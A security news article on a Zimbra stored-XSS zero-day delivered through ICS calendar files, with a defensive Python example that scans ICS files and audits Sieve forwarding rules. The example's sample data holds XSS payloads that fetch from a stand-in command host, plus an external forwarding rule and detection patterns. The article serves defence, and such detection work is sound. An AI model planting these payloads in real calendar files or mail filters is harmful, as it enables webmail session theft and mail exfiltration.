A since-patched security flaw in Zimbra Collaboration tracked as CVE-2025-27915 (CVSS 5.4), a stored cross-site scripting (XSS) bug in the Classic Web Client triggered by insufficiently sanitized HTML in ICS calendar files, was exploited as a zero-day earlier this year in attacks targeting the Brazilian military, according to a report published by StrikeReady Labs.
StrikeReady said the in-the-wild activity involved threat actors spoofing the Libyan Navy's Office of Protocol to deliver malicious ICS files to Brazilian military targets. The ICS file carried JavaScript that, because the bug is a stored XSS, ran inside the victim's authenticated webmail session when the calendar entry was rendered. Acting as a data stealer, the script siphoned credentials, e-mails, contacts and shared folders to an external server; it also searched for messages in a specific folder and added e-mail filter rules named "Correo" to forward messages to [email protected], the report said. Creating filter rules under the victim's own identity gives the attacker persistent access to future mail even after the script itself is gone.
The StrikeReady analysis also noted that the script hid certain user-interface elements and was coded to run only if more than three days had passed since its last execution, limiting the chance that repeated activity would be noticed. Zimbra fixed the vulnerability in releases published on January 27, 2025 (9.0.0 Patch 44, 10.0.13 and 10.1.5), though the vendor advisory made no mention of exploitation in the wild. Administrators who patched late should therefore not assume they were unaffected: beyond confirming the installed version, it is worth scanning received ICS attachments for embedded HTML or script and auditing users' mail filter rules for unexpected redirect rules, since a forwarding rule planted during the exposure window survives the patch.
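The two checks above, written out as an added example that is not part of StrikeReady's report or Zimbra's own tooling. The ICS scanner unfolds RFC 5545 continuation lines first, because a payload split across a folded line is invisible to a naive grep. The Sieve audit assumes Zimbra's usual layout, in which each user filter rule in the zimbraMailSieveScript attribute is preceded by a "# <rule name>" comment; that layout, the sample ICS file, the sample Sieve script and the domain names are all constructed for the example.

```python
"""Added example: spot HTML/JavaScript in ICS files and external-forwarding Sieve rules."""
import re

# --- 1. Scan an ICS file for HTML/JavaScript payloads -------------------------

# RFC 5545 folds long lines: a line break followed by one space or tab is a
# continuation. "<scr" + CRLF + " ipt>" is therefore "<script>" once unfolded,
# so we always unfold before matching.
def unfold_ics(text: str) -> str:
    return re.sub(r"\r?\n[ \t]", "", text)

# Markers that should never appear in calendar free-text fields. Matching is
# case-insensitive because browsers treat tag and attribute names that way.
PAYLOAD_PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    # an on*= attribute inside an opening tag, e.g. <img src=x onerror=...>
    ("event-handler", re.compile(r"<[a-z][^>]*\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("active-html", re.compile(r"<\s*(iframe|object|embed|svg|details|meta|form)\b", re.I)),
]

def scan_ics(text: str):
    """Return (property, finding) pairs for every ICS property value that matches a pattern."""
    findings = []
    for line in unfold_ics(text).splitlines():
        name, sep, value = line.partition(":")   # first colon separates name from value
        if not sep:
            continue
        prop = name.split(";", 1)[0].strip().upper()   # drop parameters such as ;FMTTYPE=text/html
        for label, pattern in PAYLOAD_PATTERNS:
            if pattern.search(value):
                findings.append((prop, label))
    return findings

# Constructed sample: one folded DESCRIPTION with an event handler and a folded
# HTML alternate description with a <script> tag split across the fold.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:sample-001@example.invalid\r\n"
    "SUMMARY:Protocol meeting\r\n"
    "DESCRIPTION:Agenda attached <img src=x onerror=fetch('https://c2.example.invalid/p'\r\n"
    " )>\r\n"
    "X-ALT-DESC;FMTTYPE=text/html:<html><body><scr\r\n"
    " ipt>fetch('https://c2.example.invalid/p')</script></body></html>\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

# --- 2. Audit a user's Sieve filter script for redirects to outside domains ----

# ASSUMPTION: each rule is introduced by a "# <rule name>" comment, as Zimbra's
# generated Sieve normally does. Verify against a real zimbraMailSieveScript dump.
RULE_NAME = re.compile(r"^\s*#\s*(.+?)\s*$")
REDIRECT = re.compile(r'\bredirect\s+(?::copy\s+)?"([^"]+)"', re.I)

def audit_sieve(script: str, internal_domains):
    """Return (rule_name, address) for every redirect whose domain is not internal."""
    internal = {d.lower() for d in internal_domains}
    current = "<unnamed>"
    hits = []
    for line in script.splitlines():
        m = RULE_NAME.match(line)
        if m:
            current = m.group(1)
            continue
        for addr in REDIRECT.findall(line):
            domain = addr.rsplit("@", 1)[-1].lower()
            if domain not in internal:
                hits.append((current, addr))
    return hits

# Constructed sample: a benign rule followed by a catch-all forwarding rule.
SAMPLE_SIEVE = """require ["fileinto", "redirect"];
# Keep team mail
if header :contains "subject" "[team]" {
    fileinto "Team";
    stop;
}
# Correo
if anyof (header :contains "subject" "") {
    redirect "collector@ext.example.invalid";
    stop;
}
"""

if __name__ == "__main__":
    print(scan_ics(SAMPLE_ICS))
    print(audit_sieve(SAMPLE_SIEVE, ["corp.example"]))
```

Both functions are deliberately noisy rather than precise: legitimate HTML invitations can contain tags, and a Sieve rule may forward to a partner domain on purpose, so treat the output as a triage list and confirm each hit by hand. In practice the Sieve text comes from an LDAP or zmprov dump of every account rather than a string literal, and the ICS scanner can be pointed at a mail-gateway quarantine.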
Earlier this year, security firm ESET disclosed that the Russia-linked actor APT28 had exploited XSS flaws in a range of webmail products, including Zimbra, to gain unauthorized access to mailboxes. The use of mailed calendar entries to steal credentials or to plant forwarding rules also mirrors tactics attributed to other groups, including UNC1151, according to public reporting.
StrikeReady did not identify the operator behind the recent campaign and said attribution remained unclear.